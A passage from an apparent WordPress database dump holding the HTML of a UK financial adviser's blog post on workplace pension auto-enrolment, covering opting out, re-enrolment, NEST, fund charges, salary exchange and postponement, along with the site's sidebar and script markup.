Auto-Enrolment</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n																			<div id=\"main\" class=\"clearfix \" style=\"\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n		&#13;\n										<div id=\"post-8390\" class=\"post-8390 post type-post status-publish format-standard has-post-thumbnail hentry category-pensions category-wealth-management post\">&#13;\n												<span class=\"entry-title\" style=\"display: none;\">How To Get The Most From Auto-Enrolment</span>&#13;\n						<div class=\"post-content\">&#13;\n				<h2> Auto-Enrolment in a Workplace Pension is Now a Reality.</h2>&#13;\n<p> 9 Questions to Ask Your Employer.<br/></p>&#13;\n<p>By : Reading Time 6 minutes</p>&#13;\n<h5>________________________</h5>&#13;\n<p>Between 2017 and 2018 companies with eligible employees will have to enrol employees into a workplace pension.  Initial enrolment is mandatory; however employees do have the option to “opt out” from the scheme. Whether or not this is the best course of action will depend on each individual’s circumstances.</p>&#13;\n<p/>&#13;\n<p/>&#13;\n<p>There are, however, key questions that everyone should ask their employer.</p>&#13;\n<p> <span style=\"color: #0000ff;\">What Is Opting Out?</span></p>&#13;\n<p>If you opt out within the first month of your employer enrolling you, you’ll get back any money you’ve already paid in. If you opt out later than this, you may not be able to get your payments refunded. These will usually stay in your pension until you retire.</p>&#13;\n<p><span style=\"color: #0000ff;\">What Is The Process For Opting Out?</span></p>&#13;\n<p>When your employer enrols you in a workplace pension, you can choose to opt out. If you want to do this, your employer will provide you with contact details of the pension scheme provider. They will tell you how to opt out.</p>&#13;\n<p><span style=\"color: #0000ff;\">What Is The Process For Opting Back In?</span></p>&#13;\n<p>You can start paying into your employer’s workplace pension again. You need to write to your employer to request to be re-enrolled. Your employer has to accept you back into their workplace pension, but only once in every twelve month period.</p>&#13;\n<p><span style=\"color: #0000ff;\">When Does Automatic Re-Enrolment Start?</span></p>&#13;\n<p> Under current rules, you will be automatically re-enrolled every 3 years.  This could be a good opportunity to get some unbiased advice on your financial situation and review your financial plan for retirement.</p>&#13;\n<p><span style=\"color: #0000ff;\">Will You Be Part Of NEST?</span></p>&#13;\n<p>NEST is the National Employment Savings Trust.  In essence it is a tool to facilitate the provision of workplace pensions.  Employers can choose to use it to manage all aspects of their pension scheme.  When they do so, savers can access all relevant details from an online account. Employers can also choose to use an approved scheme from a different pension scheme provider.</p>&#13;\n<p><span style=\"color: #0000ff;\">Where Is My Money Invested?</span></p>&#13;\n<p>The pension scheme provider will offer a choice of funds and it is important to ensure that you pick the best option for you.  Different investments carry different degrees of risk.  It is therefore crucial to pick the one which strikes the right balance of risk and reward for your personal situation.</p>&#13;\n<p><span style=\"color: #0000ff;\">What Are The Charges?</span></p>&#13;\n<p>The more money goes towards charges, the less goes towards investing for your future.  That being so; funds with higher charges should have a clear justification for them.  Whichever provider your employer uses there may still be different charges for different funds.<br/></p>&#13;\n<p><span style=\"color: #0000ff;\">Do You Use Salary Exchange?</span></p>&#13;\n<p>Salary Exchange means an employee agrees to give up part of their salary equivalent to the contributions made to a workplace pension. In return, the employer agrees to increase the employer pension contributions to the pension scheme by the same amount. This means both the employee and employer will pay less National Insurance since this will be paid on the reduced salary rather than the full salary. This arrangement requires the agreement of both parties.  It cannot be forced on employees.</p>&#13;\n<p><span style=\"color: #0000ff;\">Do You Use Postponement?</span></p>&#13;\n<p>Postponement allows employers to defer auto-enrolment into a workplace pension for up to three months For example:  The employer may have temporary or short-term staff that will cease employment within the postponement period. The employer must write to any member of staff whom they postpone to tell them.</p>&#13;\n<p>As always if you have any questions or want to see how whole of life insurance could work for you then don’t hesitate to contact us here at Equity SMART. We’re only a phone call or an e-mail away!</p>&#13;\n<p>Warmest regards</p>&#13;\n<p>Sam</p>&#13;\n							</div>&#13;\n									<div class=\"meta-info\">&#13;\n				<div class=\"vcard\">&#13;\n					By <span class=\"fn\"><a href=\"../author/paul/\" title=\"Posts by Becky Barnet\" rel=\"author\"/></span><span class=\"sep\">|</span>Categories: <a href=\"../category/pensions/\" title=\"View all posts in Pensions\" rel=\"category tag\">Pensions</a>, <a href=\"../category/wealth-management/\" title=\"View all posts in Wealth Management\" rel=\"category tag\">Wealth Management</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: </span><span class=\"sep\">|</span><a href=\"../get-auto-enrolment/\" title=\"Comment on How To Get The Most From Auto-Enrolment\">0 Comments</a>				</div>&#13;\n			</div>&#13;\n												<div class=\"share-box\">&#13;\n				<h4> </h4>&#13;\n				<ul class=\"social-networks social-networks-dark\"><li class=\"facebook\">&#13;\n						<a href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.equalitywalk.org.uk/get-auto-enrolment/&amp;p[title]=How%20To%20Get%20The%20Most%20From%20Auto-Enrolment\" target=\"_blank\">&#13;\n							Facebook&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Facebook</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"twitter\">&#13;\n						<a href=\"http://twitter.com/home?status=How+To+Get+The+Most+From+Auto-Enrolment%20http://www.equalitywalk.org.uk/get-auto-enrolment/\" target=\"_blank\">&#13;\n							Twitter&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Twitter</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"linkedin\">&#13;\n						<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/get-auto-enrolment/&amp;title=How%20To%20Get%20The%20Most%20From%20Auto-Enrolment\" target=\"_blank\">&#13;\n							LinkedIn&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>LinkedIn</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"reddit\">&#13;\n						<a href=\"http://reddit.com/submit?url=http://www.equalitywalk.org.uk/get-auto-enrolment/&amp;title=How%20To%20Get%20The%20Most%20From%20Auto-Enrolment\" target=\"_blank\">&#13;\n							Reddit&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Reddit</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tumblr\">&#13;\n						<a href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fget-auto-enrolment%2F&amp;name=How+To+Get+The+Most+From+Auto-Enrolment&amp;description=Initial+enrolment+is+mandatory%3B+however+employees+do+have+the+option+to+%E2%80%9Copt+out%E2%80%9D+from+the+scheme.+Whether+or+not+this+is+the+best+course+of+action+will+depend+on+each+individual%27s+circumstances.\" target=\"_blank\">&#13;\n							Tumblr&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Tumblr</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"google\">&#13;\n						<a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/get-auto-enrolment/\" onclick=\"javascript:window.open(this.href,&#13;&#10;  \'\', \'menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=600,width=600\');return false;\" target=\"_blank\">&#13;\n							Google +1&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Google +1</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tf-pinterest\">&#13;\n												<a href=\"#\">&#13;\n							Pinterest&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Pinterest</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"email\">&#13;\n						<a href=\"mailto:?subject=How To Get The Most From Auto-Enrolment&amp;body=http://www.equalitywalk.org.uk/get-auto-enrolment/\">&#13;\n							Email&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Email</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n									</ul></div>&#13;\n									<div class=\"about-author\">&#13;\n				<div class=\"title\"><h2>About the Author: <a href=\"../author/paul/\" title=\"Posts by Becky Barnet\" rel=\"author\"/></h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n				<div class=\"about-author-container\">&#13;\n					<div class=\"avatar\">&#13;\n											</div>&#13;\n					<div class=\"description\"/>&#13;\n				</div>&#13;\n			</div>&#13;\n			&#13;\n												&#13;\n							&#13;\n<!-- You can start editing here. -->&#13;\n&#13;\n&#13;\n			<!-- If comments are open, but there are no comments. -->&#13;\n&#13;\n	 &#13;\n&#13;\n&#13;\n									<div id=\"respond\" class=\"comment-respond\">&#13;\n				<h3 id=\"reply-title\" class=\"comment-reply-title\"><div class=\"title\"><h2> </h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div> <small><a rel=\"nofollow\" id=\"cancel-comment-reply-link\" href=\"../get-auto-enrolment/\" style=\"display:none;\">Cancel reply</a></small>&#13;\n									</h3><form action=\"/\" method=\"post\" id=\"commentform\" class=\"comment-form\">&#13;\n																										<div id=\"comment-input\"><input type=\"text\" name=\"author\" id=\"author\" value=\"\" placeholder=\"Name (required)\" size=\"22\" tabindex=\"1\" aria-required=\"true\" class=\"input-name\"/><input type=\"text\" name=\"email\" id=\"email\" value=\"\" placeholder=\"Email (required)\" size=\"22\" tabindex=\"2\" aria-required=\"true\" class=\"input-email\"/></div>&#13;\n												<div id=\"comment-textarea\"/>												<p class=\"form-submit\">&#13;\n							<input name=\"submit\" type=\"submit\" id=\"comment-submit\" value=\"Post Comment\"/><input type=\"hidden\" name=\"comment_post_ID\" value=\"8390\" id=\"comment_post_ID\"/></p>&#13;\n						<p style=\"display: none;\"><input type=\"hidden\" id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" value=\"5912bdcc25\"/></p>&#13;\n<p style=\"display: none;\"><input type=\"hidden\" id=\"ak_js\" name=\"ak_js\" value=\"162\"/></p>					&#13;\n							</form></div><!-- #respond -->&#13;\n			        <script type=\"text/javascript\"><![CDATA[\r\n            jQuery(document).ready(function () {\r\n                jQuery(\'#commentform\').submit(function () {\r\n                    _gaq.push(\r\n                            [\'_setAccount\', \'UA-10958181-3\'],\r\n                            [\'_trackEvent\', \'comment\', \'submit\']\r\n                    );\r\n                });\r\n            });\r\n        ]]></script></div>&#13;\n			</div>&#13;\n		<div id=\"sidebar\" style=\"float:right;\">&#13;\n	<div id=\"text-24\" class=\"widget widget_text\">			<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big><br/><br/>subscribers who get new content from us on a monthly basis</center><br/><a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"/><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>&#13;\n		</div><div id=\"recent_works-widget-2\" class=\"widget recent_works\"><div class=\"heading\"><p>New Guides</p></div>		<div class=\"recent-works-items clearfix\">&#13;\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		</div><div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">		<div class=\"tab-holder\">&#13;\n			<div class=\"tab-hold tabs-wrapper\">&#13;\n				<ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tab-popular\">Popular</a></li>&#13;\n															<li><a href=\"#tab-recent\">Recent</a></li>&#13;\n														</ul><div class=\"tab-box tabs-container\">&#13;\n										<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../best-annuity-rates/\">&#13;\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\n									<div class=\"meta\">&#13;\n										March 21st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									<div class=\"meta\">&#13;\n										September 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									<div class=\"meta\">&#13;\n										September 18th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n									<div class=\"meta\">&#13;\n										September 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n															<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../new-individual-savings-accounts/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../new-individual-savings-accounts/\">The New Individual Savings Accounts</a>&#13;\n									<div class=\"meta\">&#13;\n										May 14th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../get-auto-enrolment/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../get-auto-enrolment/\">How To Get The Most From Auto-Enrolment</a>&#13;\n									<div class=\"meta\">&#13;\n										May 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../may-2014-stock-market-bulletin/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../may-2014-stock-market-bulletin/\">May 2017 Stock Market Bulletin</a>&#13;\n									<div class=\"meta\">&#13;\n										May 7th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../bank-left-stranded-without-financial-adviser/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../bank-left-stranded-without-financial-adviser/\">Has Your Bank Left You Stranded Without a Financial Adviser</a>&#13;\n									<div class=\"meta\">&#13;\n										April 7th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../april-2014-stock-market-bulletin/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../april-2014-stock-market-bulletin/\">April 2017 Stock Market Bulletin</a>&#13;\n									<div class=\"meta\">&#13;\n										April 2nd, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n														</div>&#13;\n			</div>&#13;\n		</div>&#13;\n		</div><div id=\"categories-3\" class=\"widget widget_categories\"><div class=\"heading\"><p>Post Categories</p></div><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (1)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (3)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (7)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"1\">Wealth Management  (16)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\n	var dropdown = document.getElementById(\"cat\");\r\n	function onCatChange() {\r\n		if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></div><div id=\"social_links-widget-2\" class=\"widget social_links\"><div class=\"heading\"><p>Get Social</p></div>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul></div><div id=\"text-23\" class=\"widget widget_text\">			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"../WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\"/></a><script type=\"text/javascript\" src=\"../leadbox-690.js\"/></div>&#13;\n		</div>	</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-4\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Our Latest Posts</p>		<ul><li>&#13;\n				<a href=\"../new-individual-savings-accounts/\">The New Individual Savings Accounts</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../get-auto-enrolment/\">How To Get The Most From Auto-Enrolment</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../may-2014-stock-market-bulletin/\">May 2017 Stock Market Bulletin</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../bank-left-stranded-without-financial-adviser/\">Has Your Bank Left You Stranded Without a Financial Adviser</a>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Equity SMART</p>			<div class=\"textwidget\"><p>Established for over 20 years we work with individuals, families and owner managed businesses countrywide, helping them organise; plan; protect and achieve the future they choose, through \"hands on\" objective and realistic financial advice they can depend on.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-22\" class=\"footer-widget-col widget_text\"><p>Download FREE Guides</p>			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/1435eb973f72a2%3A125d9572eb46dc/5753952654065664/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"../w3QPpbD3DJXcyqPrBaexcUOnTpQKlOX0XuzNYejlD3Hwl1wrM5qbyjoyp4eUJt-wEdlJsAojFjru39Y0ZjrDnA_s0.jpg\"/></a><script type=\"text/javascript\" src=\"../leadbox-689.js\"/></div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col last\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>		<div class=\"contact-info-container\">&#13;\n				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>&#13;\n		&#13;\n				&#13;\n				</div>&#13;\n		<div style=\"clear:both;\"/></div><div id=\"social_links-widget-3\" class=\"footer-widget-col social_links\"><p>Connect With Us</p>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul><div style=\"clear:both;\"/></div>				</article></section></div>&#13;\n	</footer><footer id=\"footer\"/><!-- wrapper --><script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main.js\"/><script type=\"text/javascript\" src=\"../scripts.hellobar.com/565e6e29d8b6bfca77549154aee8b14f23536824.js\"/></body>','&#13;\n	How To Get The Most From Auto-Enrolment','Read about','publish','closed','closed','','how-to-get-the-most-from-auto-enrolment','','','2017-09-21 16:34:30','2017-09-21 16:34:30','',0,'http://www.equalitywalk.org.uk/how-to-get-the-most-from-auto-enrolment',0,'page','',0),(68,1,'2017-09-21 16:34:31','2017-09-21 16:34:31','<body class=\"page page-id-141 page-child parent-pageid-30 page-template page-template-side-navigation-php light  wpb-js-composer js-comp-ver-3.5.4 vc_responsive\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n					<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v2\">&#13;\n		&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul id=\"nav\" class=\"menu\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214\"><a href=\"/wealth-management\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44\"><a href=\"/wealth-platform\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27\"><a href=\"/pensions\">Pensions</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"/pensions/pension-release\">Pension Release</a></li>&#13;\n	<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"/pensions/pension-transfer\">Pension Transfer</a></li>&#13;\n	<li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-136\"><a href=\"/pensions/auto-enrolment-pensions\">Auto Enrolment Pensions</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"/auto-enrolment-report\">Auto Enrolment Report</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"/pension-review\">Pension Review</a></li>&#13;\n	<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"/pensions/sipps\">SIPPS</a></li>&#13;\n	<li id=\"menu-item-105\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-105\"><a href=\"/pensions/stakeholder-pensions\">Stakeholder Pensions</a></li>&#13;\n	<li id=\"menu-item-127\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-127\"><a href=\"/pensions/occupational-pensions\">Occupational Pensions</a></li>&#13;\n	<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"/pensions/group-pension-plan\">Group Pension Plan</a></li>&#13;\n	<li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a 